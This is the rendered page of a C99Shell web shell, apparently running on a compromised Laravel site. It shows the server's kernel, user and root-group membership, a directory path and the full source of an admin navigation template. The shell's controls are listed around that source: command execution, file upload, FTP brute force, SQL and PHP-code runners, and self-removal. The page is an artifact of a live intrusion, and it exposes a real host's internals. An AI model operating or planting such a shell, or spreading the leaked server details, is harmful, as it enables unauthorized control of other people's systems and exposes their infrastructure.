!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/resources/views/admin/layouts/partials/   drwxr-xr-x
Free 29.41 GB of 117.98 GB (24.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     top-right-nav.blade.php (6.11 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@php
$user = auth()->user();
@endphp
<li class="nav-item dropdown">
    <a class="nav-link d-flex justify-content-center align-items-center" data-toggle="dropdown" href="#"
        aria-expanded="false">
        <i class="fas fa-plus"></i>
    </a>
    <div class="dropdown-menu dropdown-menu-lg dropdown-menu-right" style="left: inherit; right: 0px;">
        <span class="dropdown-item dropdown-header">{{ __('quick_actions') }}</span>
        <div class="dropdown-divider"></div>
        <div class="row row-paddingless" style="padding-left: 15px; padding-right: 15px;">
            @if (userCan('order.view'))
                <div class="col-6 p-0 border-bottom border-right">
                    <a href="{{ route('order.index') }}" class="d-block text-center py-3 bg-hover-light">  <i class="fas fa-money-bill"></i>
                        <span class="w-100 d-block text-muted">{{ __('order') }}</span>
                    </a>
                </div>
            @endif
            @if (userCan('ad.create'))
                <div class="col-6 p-0 border-bottom border-right">
                    <a href="{{ route('module.ad.create') }}" class="d-block text-center py-3 bg-hover-light">  <i class="fas fa-money-bill"></i>
                        <span class="w-100 d-block text-muted">{{ __('create_listing') }}</span>
                    </a>
                </div>
            @endif
            @if (userCan('post.create'))
                <div class="col-6 p-0 border-bottom border-right">
                    <a href="{{ route('module.post.create') }}" class="d-block text-center py-3 bg-hover-light"> <i
                            class="fas fa-blog"></i>
                        <span class="w-100 d-block text-muted">{{ __('create_post') }}</span>
                    </a>
                </div>
            @endif
            @if (userCan('customer.view'))
                <div class="col-6 p-0 border-bottom border-right">
                    <a href="{{ route('module.customer.index') }}" class="d-block text-center py-3 bg-hover-light"> <i
                            class="fas fa-users"></i>
                        <span class="w-100 d-block text-muted">{{ __('customer') }}</span>
                    </a>
                </div>
            @endif


            @if (userCan('setting.view') || userCan('setting.update'))
                <div class="col-12 border-bottom border-right">
                    <a href="{{ route('settings.general') }}" class="d-block text-center py-3 bg-hover-light"> <i
                            class="fas fa-cog"></i>
                        <span class="w-100 d-block text-muted">{{ __('settings') }}</span>
                    </a>
                </div>
            @endif
        </div>
        <div class="dropdown-divider"></div>
    </div>
</li>
@if ($language_enable)
    <li class="nav-item dropdown">
        <a class="nav-link d-flex justify-content-center align-items-center" data-toggle="dropdown" href="#"
            aria-expanded="false">
            <i class="fas fa-language" style="font-size: 22px"></i>
        </a>
        <div class="dropdown-menu dropdown-menu-sm dropdown-menu-right" style="left: inherit; right: 0px;">

            @foreach ($languages as $lang)
                <a class="dropdown-item {{ session('set_lang') === $lang->code ? 'active' : '' }}"
                    href="{{ route('changeLanguage', $lang->code) }}">
                    <i class="flag-icon {{ $lang->icon }}"></i> {{ $lang->name }}
                </a>
            @endforeach
        </div>
    </li>
@endif
<li class="nav-item">
    <a class="nav-link d-flex justify-content-center align-items-center" data-widget="fullscreen" href="#"
        role="button">
        <i class="fas fa-expand-arrows-alt"></i>
    </a>
</li>
@if ($appearance_enable)
    <li class="nav-item">
        <form action="{{ route('settings.mode.update') }}" method="post" id="mode_form">
            @csrf
            @method('PUT')
            @if ($setting->dark_mode)
                <input type="hidden" name="dark_mode" value="0">
            @else
                <input type="hidden" name="dark_mode" value="1">
            @endif
        </form>
        <a onclick="$('#mode_form').submit()" class="nav-link d-flex justify-content-center align-items-center"
            href="#" role="button">
            @if ($setting->dark_mode)
                <i class="fas fa-sun"></i>
            @else
                <i class="fas fa-moon"></i>
            @endif
        </a>
    </li>
@endif
<li class="nav-item dropdown user-menu">
    <a href="{{ route('profile') }}" class="nav-link dropdown-toggle" data-toggle="dropdown" aria-expanded="false">
        @if ($user->image_url)
            <img src="{{ $user->image_url }}" class="user-image img-circle elevation-2">
        @else
            <img src="{{ asset('image/default-user.png') }}" class="user-image img-circle elevation-2">
        @endif
        <span class="d-none d-md-inline">{{ $user->name }}</span>
    </a>
    <ul class="dropdown-menu dropdown-menu-lg dropdown-menu-right rounded border-0" style="left: inherit; right: 0px;">
        <!-- User image -->
        <li class="user-header bg-primary rounded-top">
            <img src="{{ $user->image_url }}" class="user-image img-circle elevation-2"
                alt="{{ __('user_image') }}">
            <p>
                {{ $user->name }} -
                @foreach ($user->getRoleNames() as $role)
                    (<span>{{ ucwords($role) }}</span>)
                @endforeach
                <small>{{ __('member_since') }} {{ $user->created_at->format('M d, Y') }}</small>
            </p>
        </li>
        <!-- Menu Footer-->
        <li class="user-footer border-bottom d-flex">
            <a href="{{ route('profile') }}" class="btn btn-default">{{ __('profile') }}</a>
            <a href="javascript:void(0)"
                onclick="event.preventDefault();document.getElementById('logout-form').submit();"
                class="btn btn-default ml-auto">{{ __('sign_out') }}</a>
            <form id="logout-form" action="{{ route('admin.logout') }}" method="POST" class="d-none invisible">
                @csrf
            </form>
        </li>
    </ul>
</li>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0049 ]--